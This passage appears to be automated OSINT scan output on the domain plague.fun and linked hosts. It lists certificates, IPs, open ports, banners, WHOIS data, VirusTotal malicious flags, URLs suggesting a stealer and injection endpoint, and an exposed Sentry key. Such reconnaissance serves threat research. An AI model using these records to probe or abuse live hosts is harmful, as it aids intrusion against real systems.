Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 69:40:ed:22:fe:60:b0:02:ad:3a:4e:78:f4:bb:89:96:9b:b5: ab:72:8b:0b:df:3a:e4:b1:98:69:7b:5e:f5:09:60:f2:7d:89: d6:4c:d4:92:b7:7b:25:4a:8d:f7:24:18:e5:1e:dd:40:a6:e9: d8:00:0d:09:02:72:b2:7c:1b:ae:00:0b:34:5c:a9:e8:f3:b5: 24:0c:54:57:a3:b2:38:72:b7:2c:e5:ec:06:fe:84:a5:06:77: 1e:75:01:de:a0:8e:a6:1c:0f:c3:1f:cf:a5:46:73:df:e8:29: c9:f2:53:1b:60:56:ef:a2:a8:f8:bb:1d:d7:86:fe:80:75:97: e4:9c:94:44:f3:55:56:85:31:11:bc:51:28:73:2d:c4:06:9c: e3:59:07:bd:ef:a5:9a:4d:8c:29:86:3c:cf:72:5c:a8:09:99: a0:c1:3a:ca:77:e1:33:db:d8:bc:a1:0a:ed:05:40:f7:c4:fd: 
61:82:b2:93:37:d2:a2:93:53:4d:c2:46:10:31:30:86:f7:2c: 13:5e:16:4e:f1:da:57:ba:4c:8f:70:fe:9c:d4:4d:8d:48:4c: 19:b9:9c:71:58:e6:d3:91:96:76:59:42:f8:54:b6:86:52:b4: 14:64:b1:08:ba:2f:27:33:22:9f:33:14:ec:1e:dd:aa:f2:97: b7:2b:3c:4f plague.fun
2022-12-18 00:27:03 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [104.21.27.242] 104.21.27.242
2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77acf89f69089b33-FRA Content-Encoding: gzip 188.114.97.1
2022-12-18 00:21:47 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3032::/48 2606:4700:3032::ac43:8925
2022-12-18 00:08:30 Open TCP Port No LeakIX 0 0 1 0 None plague.fun:80 plague.fun
2022-12-18 00:37:11 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.241] https://www.virustotal.com/en/ip-address/81.88.52.241/information/ 81.88.52.241
2022-12-18 00:02:58 Raw Data from RIRs No Tool - WAFW00F 0 0 1 0 None [{"url": "https://zerotwo-best-waifu.online", "firewall": "Generic", "detected": true, "manufacturer": "Unknown"}] zerotwo-best-waifu.online
2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.99 90.116.166.104
2022-12-18 00:09:36 Co-Hosted Site No HackerTarget 0 0 2 0 None stadverket.ru.com 104.21.28.240
2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 39729 81.88.48.0/20
2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2053 188.114.96.1
2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2053 188.114.96.0
2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; 
charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b30f673b0f226e-ORD Content-Encoding: gzip 104.21.28.240
2022-12-18 00:03:15 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-100.w90-116.abo.wanadoo.fr 90.116.166.100
2022-12-18 00:23:31 Raw DNS Records No DNS Raw Records 0 0 2 0 None smtp.zerotwo-best-waifu.online. 900 IN CNAME smtp-fr.securemail.pro. smtp.zerotwo-best-waifu.online
2022-12-18 00:10:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.97.0
2022-12-18 00:21:06 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 172.67.147.230
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) 37.780462,-122.390564
2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:d0:d1:a1:cc:7c:20:ed:eb:01:fc:85:dd:45:cc:e5:1b:da Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 23 15:38:18 2022 GMT Not After : Jan 21 15:38:17 2023 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:30:c0:bf:22:a0:03:97:7c:f3:8c:17:0c:53:80: 20:b4:f6:13:23:b9:ef:35:89:44:f0:e2:fc:48:0d: f6:4e:fb:2b:50:6e:fe:d0:e3:1f:5d:4b:89:9f:9c: 63:33:04:0b:09:42:86:ef:02:27:68:3a:fa:66:ad: 7a:1c:4b:e5:f1 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 04:E3:72:52:84:D9:47:FF:A7:25:8B:BE:55:2A:4D:59:86:DF:3E:75 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C: 5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99 Timestamp : Oct 23 16:38:18.729 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:A9:DD:3E:19:3D:08:47:5F:9B:B1:90: AB:C2:AD:E2:91:05:EF:EF:95:99:23:9E:12:BB:18:C5: 
F2:98:2C:7F:FF:02:20:30:69:42:8A:34:18:68:E8:E1: F4:E4:D9:94:CF:C5:34:EF:39:1A:43:D9:9C:47:8E:41: 10:2C:6F:3A:20:E3:E1 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Oct 23 16:38:19.220 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:58:B9:B1:8C:CD:43:D6:1D:83:3C:11:03: 67:28:6C:A1:33:53:B6:B9:D3:EF:70:AC:2C:55:58:71: 2E:86:6B:B5:02:20:79:E1:6E:03:7A:1D:27:C9:CF:88: 7F:0A:27:1B:AC:A1:FC:FF:D1:EB:63:9F:F0:A2:83:F0: 8C:43:7D:35:95:3E Signature Algorithm: sha256WithRSAEncryption b3:8e:0e:18:93:0e:cb:14:85:53:38:63:b9:c4:c0:d7:e4:4e: dc:9d:12:7a:89:0c:2f:98:28:52:78:91:27:0f:94:c1:fa:fe: 10:3d:ba:69:8a:b2:78:c5:ad:24:ba:d2:9e:b2:55:6d:45:b4: 73:54:49:49:bf:c7:19:04:52:d4:e1:93:fc:98:b7:97:7c:7f: 26:55:42:83:ef:fc:4b:d8:32:e7:fb:cc:ab:3c:14:ef:c7:6f: e3:45:ff:53:ca:92:99:e1:1c:d2:23:29:21:4a:53:d0:24:3e: ff:cb:df:0f:ef:c6:99:94:bf:6e:64:6f:36:d9:fd:b9:c8:0d: 60:6b:96:9b:c3:95:60:3d:16:6c:16:b8:cb:7a:58:0c:af:e3: 50:60:ca:2b:a1:72:ab:fe:b3:ff:6e:cd:af:8d:4b:90:c4:9b: 45:cb:c0:86:ac:fd:47:ad:dd:ab:16:9d:80:9d:2c:84:4e:c7: bd:61:2f:7c:dc:e9:b5:ec:dd:68:eb:2e:6a:4b:85:4f:35:de: 17:7f:39:da:a5:e7:f3:0f:03:a8:5a:7c:17:87:19:e0:84:84: 02:3d:34:70:83:8a:92:0d:41:cf:d2:cd:4e:45:68:f0:4c:c1: b4:46:ea:13:51:52:23:22:dd:ba:36:a7:32:92:76:b7:68:de: 7a:b8:fb:be
2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:8080 188.114.97.0/24
2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.191 34.149.204.188
2022-12-18 00:10:05 Linked URL - Internal No URLScan.io 1 0 1 0 None https://zerotwo-best-waifu.online/778112985743251/wap/shatlegay/stealer123365 zerotwo-best-waifu.online
2022-12-18 00:20:54 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [34.149.204.188] https://www.virustotal.com/en/ip-address/34.149.204.188/information/ 34.149.204.188
2022-12-18 00:08:45 Internet Name - 
Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.96.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33bc1553b0a055e42aa7d864fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'404 Not Found', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'atlas.plague.fun', u'summary': u'Date: 
Fri, 04 Nov 2022 14:12:30 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ClqhVn5nSDtkklqr%2BmnSCvD9r8PWQF%2F88kiAg2dn43%2F57%2B43abjyeldwgPSlVgPWGi3Lnc3kXWmGp3tptIEJ4%2F6XT%2FcyMqiw%2FdFJnk7r%2FEt7i4KjB2lSsRxWQP2Geqr%2F2Jf"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764df1e8095ab83a-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 404 Not Found\n\ncf\r\n\n\n404 Not Found\n

Not Found

\n

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

\n\r\n0\r\n\r\n', u'time': u'2022-11-04T14:12:29.195922804Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987310280cb7d632b5845847c2f419e2c9ddaaedfc99512844cb8', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'73', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2022-11-30T17:51:41Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'bbb95c587c22383e98c0c76edbbfd861351749a07ae39c9d4d43a5aee78540b7', u'key_algo': u'ECDSA', u'not_before': u'2022-09-01T17:51:42Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'api.plague.fun', u'summary': u'Date: 
Sun, 23 Oct 2022 16:38:46 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 73\r\nConnection: close\r\naccess-control-allow-origin: *\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wmCFw%2FYqj8604vOuoCeM2hBuifGq6KtOhHeKBOWsRA%2B54NPwmSqyfGIPk6jRMMW5tGyxQs7ve%2BDWPe8fFcjhv%2Fa9mWikvGufQUCzHDENLFGws4wis6UMHPbfqGd6lapb9w%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 75ebe7a87fadcaa9-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n# Roses are red\n\n# Violets are blue\n\n# You are a skid\n\n# Nobody likes you', u'time': u'2022-10-23T16:38:44.953959619Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'2a06:98c1:3120::3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'2a06:98c1:3120:0:0:0:0:0/46'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68625d295855d87ce36c4e05e9', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://plague.fun/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', 
u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Sun, 30 Oct 2022 20:20:51 GMT\r\nLocation: https://plague.fun/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=p0niSQHcHJYrt94pMK%2FWr74YUZs%2BvcDsHR4GVggs7kEqo8GFbUOH1p8yewavJYpzdeRdgmQf7L%2B0bs%2B3tFNCNgz%2Fk3qh0PO2FjpU4p6sNMeUApthX75f68Yi1FZpoayqhhh1HsoOYqPg"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 762682b70a0ccabd-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-10-30T19:20:50.988305392Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33c3c26f3899c099bd7684b50a', u'leak': {u'dataset': {u'files': 0, u'rows': 0, 
u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Plague', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\
2022-12-18 00:31:50 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.133:21 195.110.124.0/24
2022-12-18 00:20:59 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2606:4700:3033::6815:1cf0
2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2087 104.21.19.243
2022-12-18 00:11:11 Similar Domain - Whois No Whois 0 0 2 0 None Domain Name: plague.in Registry Domain ID: D1204034-IN Registrar WHOIS Server: Registrar URL: https://www.namesilo.com Updated Date: 2022-05-19T13:08:01Z Creation Date: 2005-03-16T21:19:11Z Registry Expiry Date: 2023-03-16T21:19:11Z Registrar: NameSilo, LLC Registrar IANA ID: 1479 Registrar Abuse Contact Email: Registrar 
Abuse Contact Phone: Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: See PrivacyGuardian.org Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: AZ Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please contact the Registrar listed above Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please contact the Registrar listed above Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please contact the Registrar listed above Name Server: ns2.dnsowl.com Name Server: ns1.dnsowl.com Name Server: ns3.dnsowl.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: 
https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Access to .IN WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the .IN registry database. The data in this record is provided by .IN Registry for informational purposes only ,and .IN does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator or a Registrar, or NIXI except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. .IN reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.in
2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN/ plague.fun
2022-12-18 00:16:27 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.96.9
2022-12-18 00:21:54 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77af968c6fa22d82-ORD Content-Encoding: gzip 104.21.7.179
2022-12-18 00:20:46 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-23T01:34:36.916Z", "ip": "40.113.112.131", "location_updated_at": "2022-12-18T00:20:43.061599Z", "autonomous_system_updated_at": "2022-12-18T00:20:43.061599Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "40.112.0.0/13", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 40.113.112.131
2022-12-18 00:23:07 Raw Data from RIRs No CRXcavator 0 0 1 0 None [{"platform": "Chrome", "extension_id": "bifklmkjcgfnoholohpcenkjpdmkjmgj", "name": "Plague Inc Virus Wallpaper New Tab Theme", "icon": "https://lh3.googleusercontent.com/t3AZD_bhGqf5h9npZwhB5JHvvanvwSU_k_2X80WVbSgN-dYpJCtbCjiCqEjiMZry-TKfVf0r1kHQgYys0bVyTPmxRO4=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "mlbijjeimhmdbdomoalcpnelmlfjjclj", "name": "Plague Doctor Wallpapers Theme New Tab", "icon": "https://lh3.googleusercontent.com/fb9ksVgdrKheGI0g0ZJ_Ctv7XdzxU7pfaH7prTqDiWlDM8QzilpvKB2zd-0BuCggR_OSXAHDzw=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "dnejacfgfaldfjameaaaledklokkacbc", "name": "Plague Inc", "icon": "https://lh3.googleusercontent.com/0_Mq-WxO413qMWau9uPHeHGIf8oFRv6Pr-BYRbRI6hUWCZAeR2EyFBZsrsNatcARd1rEtJMgKqM=w128-h128-e365"}, {"platform": "Chrome", "extension_id": "efiefgpfndecmbeappadjclmkiahmejg", "name": "HD Plague Inc Background", "icon": "https://lh3.googleusercontent.com/jM_wv6uRdamHMwfhvrfTJgKgMZDQKUBO-1QOdDKlYThvswcAV6sJVvxOuw0XbHc_777XcVo81w=w128-h128-e365"}, {"platform": "Chrome", "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj", "name": "Plague Inc HD Wallpapers New Tab Theme", "icon": "https://lh3.googleusercontent.com/LkIiFecj0j57Vv8kQivIobtgsj7K22WUUE1FdqwQCnmDz2Nuj-45Vqyt44TeCd-CofWCIjcoSrjkv_7GX2-JA8xqVw=w128-h128-e365-rj-sc0x00ffffff"}] plague.fun
2022-12-18 00:03:17 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-105.w90-116.abo.wanadoo.fr 90.116.166.105
2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:8880 104.21.28.240
2022-12-18 00:16:37 Raw Data from RIRs No numverify 0 0 3 0 None {u'international_format': u'+33892556677', u'local_format': u'0892556677', u'number': u'33892556677', u'valid': True, u'line_type': u'premium_rate', u'location': u'', u'country_code': u'FR', u'carrier': u'', u'country_name': u'France', u'country_prefix': u'+33'} +33892556677
2022-12-18 00:27:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 7 0 None domini@dominiando.it Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse 
